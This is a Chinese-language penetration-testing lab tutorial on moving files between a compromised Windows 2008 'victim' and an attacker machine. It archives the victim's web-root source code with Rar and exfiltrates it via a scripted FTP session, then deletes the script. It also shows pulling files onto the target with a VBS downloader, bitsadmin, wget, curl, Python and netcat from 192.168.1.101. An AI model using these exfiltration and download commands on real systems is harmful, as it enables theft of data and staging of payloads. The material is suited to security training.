文件传输

实验一：利用FTP进行文件传输

实验环境：目标机：win2008

                  攻击机：物理机

实验步骤：

一、打包受害机上的源码文件

C:\Users\Administrator\Desktop\Rar.exe a -r -m3 C:\inetpub\wwwroot\cc.rar C:\inetpub\wwwroot

参数说明:
           a 添加文件到压缩文件中
          -k 锁定压缩文件
          -s产生固体存档,这样可以增大压缩比
          -r包括子目录
          -m1 设置压缩比
          -m0 存储 添加到压缩文件时不压缩文件。
          -m1 最快 使用最快方式(低压缩)
          -m2 较快 使用快速压缩方式
          -m3 标准 使用标准(默认)压缩方式
          -m4 较好 使用较好压缩方式(较好压缩，但是慢)
          -m5 最好 使用最大压缩方式(最好的压缩，但是最慢

二、物理机开启ftp服务

三、采用交互式传输

ftp用法如下：

1.输入ftp进入命令行使用ftp模式
2.输入?可查看命令
3.输入open命令登陆ftp，之后输入账号密码
	open (ftp地址)
	ftp (ftp地址)
4.查看FTP服务器上的文件
	dir：显示服务器目录和文件列表
	ls：显示服务器简易的文件列表
	cd：进入服务器指定的目录
5.上传下载文件
	下载文件
		下载指定文件：get filename newname
		filename为下载的FTP服务器上的文件名，newname为保存在本地计算机上时使用的名字，如果不指定newname，文件将以原名保存，get命令下载的文件将保存在本地计算机的工作目录下(当前目录)
	上传文件
		上传指定文件：put filename newname
		上传指定文件：send filename newname
		filename为上传的本地文件名，newname为上传至FTP服务器上时使用的名字，如果不指定newname，文件将以原名上传
6.结束并退出FTP
	close：结束与服务器的FTP会话
	quit或者bye：结束与服务器的FTP会话并退出FTP环境
7. 其它FTP命令
	pwd：查看FTP服务器上的当前工作目录
	rename filename newfilename：重命名FTP服务器上的文件
	deletefilename：删除FTP服务器上的文件

1.目标机在命令行输入ftp进入ftp

  

2.依次输入open ftp地址，用户名和密码

  

3.可输入dir查看ftp共享目录的文件

  

4.输入get 文件名，可下载文件

5.结束退出bye

四、采用非交互式传输

1.利用重定向依次将ftp命令写入txt文件

 echo open 192.168.1.101>> ftp.txt
 echo cxr>> ftp.txt
 echo cxr>> ftp.txt
 echo get 1.txt>> ftp.txt
 echo bye>> ftp.txt

2.输入以下命令，ftp.txt文件里的命令就会执行

ftp -s:ftp.txt

3.最后执行del ftp.txt可删除

实验二：利用vbs脚本进行文件传输

实验环境：目标机win2008

实验步骤：

一、类似于ftp非交互式，将vbs脚本的内容输入到一个vbs文件中

vbs脚本内容：

Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.1.101/1.php",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.ResponseBody)
sGet.SaveToFile "C:\Users\Administrator\1.php",2

注：http://处是要下载文件的路径，"C:\Users\Administrator\1.php"处是下载文件后的位置

二、输入cscript 1.vbs(vbs脚本名)，即可执行成功

实验三：利用bitsadmin下载

实验环境：win2008

实验步骤：

注：win2008上可用

直接输入命令：

bitsadmin /transfer n http://192.168.1.101/xxe.zip C:\Users\Administrator\Desktop\1.zip

注：http://192.168.1.101/xxe.zip是指从哪里下载     C:\Users\Administrator\Desktop\1.zip是指下载到哪

实验四：利用wget传输文件

实验环境：kali

实验步骤：

直接在kali命令行里输入：

wget http://192.168.1.101/xxe.zip -P /root/1.zip

注：http://192.168.1.101/xxe.zip是指下载路径     -P /root/1.zip是指指定下载到哪

实验五：利用curl传输文件

实验环境 ：kali

实验步骤：

直接在kali命令行输入

curl http://192.168.1.101/xxe.zip --output 1.zip

注：http://192.168.1.101/xxe.zip指下载路径     --output 1.zip是指定要下载的地方

实验六：利用python传输文件

实验环境：kali

实验步骤：

脚本内容：

#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://192.168.1.101/xxe.zip')
localFile = open('/root/1.zip', 'w')
localFile.write(u.read())
localFile.close()

注：http://192.168.1.101/xxe.zip替换下载地址     /root/1.zip处写下载到哪

之后执行即可

实验七：利用nc传输文件

实验环境：kali

实验步骤：

服务端输入：

cat filename | nc -lvvp 1234

下载端输入：

nc 下载地址ip 1234 > filename

即可看到文件传输成功